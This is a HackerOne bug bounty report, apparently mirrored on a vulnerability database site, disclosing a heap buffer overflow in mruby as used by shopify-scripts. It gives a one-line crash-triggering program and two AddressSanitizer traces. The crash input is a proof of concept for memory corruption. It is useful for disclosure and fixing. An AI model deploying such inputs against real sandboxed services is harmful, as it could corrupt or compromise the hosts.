Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneTitanousH1:204421
HistoryFeb 08, 2017 - 1:08 a.m.

shopify-scripts: Heap buffer oveflow with many arguments

2017-02-0801:08:34
titanous
hackerone.com
$800
10
JSON

The following program triggers a heap buffer overflow:

d 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 < 0 - 0.-- 0

ASAN report:

=================================================================
==3720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001e880 at pc 0x0000004ae8ac bp 0x7ffee59f8930 sp 0x7ffee59f80e0
WRITE of size 16 at 0x61d00001e880 thread T0
    #0 0x4ae8ab in __asan_memcpy (/vagrant/bin/mruby+0x4ae8ab)
    #1 0x64ad6d in value_move /vagrant/src/value_array.h:14:15
    #2 0x629792 in mrb_vm_exec /vagrant/src/vm.c:1181:11
    #3 0x620b8b in mrb_vm_run /vagrant/src/vm.c:801:10
    #4 0x64d298 in mrb_top_run /vagrant/src/vm.c:2533:12
    #5 0x676ec9 in mrb_load_exec /vagrant/mrbgems/mruby-compiler/core/parse.y:5755:7
    #6 0x677b65 in mrb_load_file_cxt /vagrant/mrbgems/mruby-compiler/core/parse.y:5764:10
    #7 0x4f3af5 in main /vagrant/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:232:11
    #8 0x7fb19c1e3f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287
    #9 0x41a505 in _start (/vagrant/bin/mruby+0x41a505)

0x61d00001e880 is located 0 bytes to the right of 2048-byte region [0x61d00001e080,0x61d00001e880)
allocated by thread T0 here:
    #0 0x4c4c0d in realloc (/vagrant/bin/mruby+0x4c4c0d)
    #1 0x5c14f5 in mrb_default_allocf /vagrant/src/state.c:60:12
    #2 0x550b96 in mrb_realloc_simple /vagrant/src/gc.c:201:8
    #3 0x5511e4 in mrb_realloc /vagrant/src/gc.c:215:8
    #4 0x551b23 in mrb_malloc /vagrant/src/gc.c:236:10
    #5 0x551bbd in mrb_calloc /vagrant/src/gc.c:254:9
    #6 0x618d19 in stack_init /vagrant/src/vm.c:92:28
    #7 0x616446 in mrb_funcall_with_block /vagrant/src/vm.c:365:7
    #8 0x615e60 in mrb_funcall_with_block /vagrant/src/vm.c:343:13
    #9 0x6156dc in mrb_funcall_argv /vagrant/src/vm.c:447:10
    #10 0x5247e7 in mrb_obj_new /vagrant/src/class.c:1412:3
    #11 0x53f2fe in mrb_exc_new_str /vagrant/src/error.c:32:10
    #12 0x5489ee in mrb_init_exception /vagrant/src/error.c:550:20
    #13 0x6a5710 in mrb_init_core /vagrant/src/init.c:41:3
    #14 0x5c1495 in mrb_open_core /vagrant/src/state.c:47:3
    #15 0x5c163c in mrb_open_allocf /vagrant/src/state.c:107:20
    #16 0x5c160a in mrb_open /vagrant/src/state.c:99:20
    #17 0x4f29d3 in main /vagrant/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:172:20
    #18 0x7fb19c1e3f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287

SUMMARY: AddressSanitizer: heap-buffer-overflow (/vagrant/bin/mruby+0x4ae8ab) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c3a7fffbcc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3a7fffbd10:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fffbd60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3720==ABORTING
vagrant@vagrant-ubuntu-trusty-64:/vagrant$ ASAN_SYMBOLIZER_PATH=/usr/lib/llvm-3.8/bin/llvm-symbolizer bi^Cmruby crash-triage/02.rb
vagrant@vagrant-ubuntu-trusty-64:/vagrant$ ~/mruby-engine/bin/sandbox crash-triage/02.rb
/home/vagrant/mruby-engine/bin/sandbox:20:in `sandbox_eval': undefined method '-' for nil (MRubyEngine::EngineRuntimeError)
	from /home/vagrant/mruby-engine/bin/sandbox:20:in `<main>'
vagrant@vagrant-ubuntu-trusty-64:/vagrant$ ASAN_SYMBOLIZER_PATH=/usr/lib/llvm-3.8/bin/llvm-symbolizer bin/mruby crash-triage/02.rb
=================================================================
==3777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001e880 at pc 0x0000004ae8ac bp 0x7ffe2236f750 sp 0x7ffe2236ef00
WRITE of size 16 at 0x61d00001e880 thread T0
    #0 0x4ae8ab in __asan_memcpy (/vagrant/bin/mruby+0x4ae8ab)
    #1 0x64ad6d in value_move /vagrant/src/value_array.h:14:15
    #2 0x629792 in mrb_vm_exec /vagrant/src/vm.c:1181:11
    #3 0x620b8b in mrb_vm_run /vagrant/src/vm.c:801:10
    #4 0x64d298 in mrb_top_run /vagrant/src/vm.c:2533:12
    #5 0x676ec9 in mrb_load_exec /vagrant/mrbgems/mruby-compiler/core/parse.y:5755:7
    #6 0x677b65 in mrb_load_file_cxt /vagrant/mrbgems/mruby-compiler/core/parse.y:5764:10
    #7 0x4f3af5 in main /vagrant/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:232:11
    #8 0x7f534ad6cf44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287
    #9 0x41a505 in _start (/vagrant/bin/mruby+0x41a505)

0x61d00001e880 is located 0 bytes to the right of 2048-byte region [0x61d00001e080,0x61d00001e880)
allocated by thread T0 here:
    #0 0x4c4c0d in realloc (/vagrant/bin/mruby+0x4c4c0d)
    #1 0x5c14f5 in mrb_default_allocf /vagrant/src/state.c:60:12
    #2 0x550b96 in mrb_realloc_simple /vagrant/src/gc.c:201:8
    #3 0x5511e4 in mrb_realloc /vagrant/src/gc.c:215:8
    #4 0x551b23 in mrb_malloc /vagrant/src/gc.c:236:10
    #5 0x551bbd in mrb_calloc /vagrant/src/gc.c:254:9
    #6 0x618d19 in stack_init /vagrant/src/vm.c:92:28
    #7 0x616446 in mrb_funcall_with_block /vagrant/src/vm.c:365:7
    #8 0x615e60 in mrb_funcall_with_block /vagrant/src/vm.c:343:13
    #9 0x6156dc in mrb_funcall_argv /vagrant/src/vm.c:447:10
    #10 0x5247e7 in mrb_obj_new /vagrant/src/class.c:1412:3
    #11 0x53f2fe in mrb_exc_new_str /vagrant/src/error.c:32:10
    #12 0x5489ee in mrb_init_exception /vagrant/src/error.c:550:20
    #13 0x6a5710 in mrb_init_core /vagrant/src/init.c:41:3
    #14 0x5c1495 in mrb_open_core /vagrant/src/state.c:47:3
    #15 0x5c163c in mrb_open_allocf /vagrant/src/state.c:107:20
    #16 0x5c160a in mrb_open /vagrant/src/state.c:99:20
    #17 0x4f29d3 in main /vagrant/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:172:20
    #18 0x7f534ad6cf44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287

SUMMARY: AddressSanitizer: heap-buffer-overflow (/vagrant/bin/mruby+0x4ae8ab) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c3a7fffbcc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3a7fffbd10:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fffbd60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3777==ABORTING
JSON